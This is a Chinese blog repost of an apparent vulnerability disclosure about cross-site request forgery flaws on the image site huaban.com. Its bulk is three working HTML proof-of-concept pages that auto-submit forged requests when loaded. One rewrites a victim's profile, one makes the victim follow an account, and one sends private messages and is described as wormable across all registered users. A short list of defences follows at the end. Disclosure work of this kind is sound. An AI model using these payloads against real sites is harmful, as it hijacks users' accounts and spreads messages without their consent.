花瓣网全站点多处功能设计缺陷导致跨站请求伪造(CSRF)(可利用私信功能影响全站注册用户)。

花瓣网全站点多处功能设计缺陷导致跨站请求伪造(CSRF)。

poc全部在下方。

本次影响范围:(包括但不限于)

网站用户个人资料篡改。

网站任意用户刷粉丝。

全站用户私信可被蠕虫。

网站用户个人资料篡改:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>花瓣网CSRF跨站请求伪造安全漏洞POC</title>
</head>
<body>
<form name="name1" action="http://huaban.com/settings/" method="post">
<input type="hidden" name="user[username]" value="argzs"/>
<input type="hidden" name="profile[sex]" value="0"/>
<input type="hidden" name="profile[about]" value="aryj CSRF!"/>
</form>
<script> 
window.onload=function(){
  document.name1.submit();   
}
</script> 
</body>
</html>

网站任意用户刷粉丝:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>花瓣网CSRF跨站请求伪造安全漏洞POC</title>
</head>
<body>
<form name="name1" action="http://huaban.com/xiaomeihehe2012/follow/" method="post">
</form>
<script> 
window.onload=function(){
  document.name1.submit();   
}
</script> 
</body>
</html>

全站用户私信可被蠕虫:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>花瓣网CSRF跨站请求伪造安全漏洞POC</title>
</head>
<body>
<form name="name1" action="http://huaban.com/dm/send/" method="post">
<input type="hidden" name="to_user_id" value="13056618"/>
<input type="hidden" name="text" value="test by 安然意境@Wooyun"/>
</form>
<script> 
window.onload=function(){
  document.name1.submit();   
}
</script> 
</body>
</html>

 

解决方案:

1.验证码被认为是对抗CSRF攻击最简洁有效的防御方法。

2.Referer Check.

3.Anti CSRF Token.

 

    上一篇: XML安全之Web Services - 网站安全 - 自学php网

    下一篇: ecshop一处验证码绕过逻辑漏洞 - 网站安全 - 自学php网
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《花瓣网全站点多处功能设计缺陷导致跨站请求伪造(CSRF)(可利用私信功能影响全站注册用户) –
   

还没有人抢沙发呢~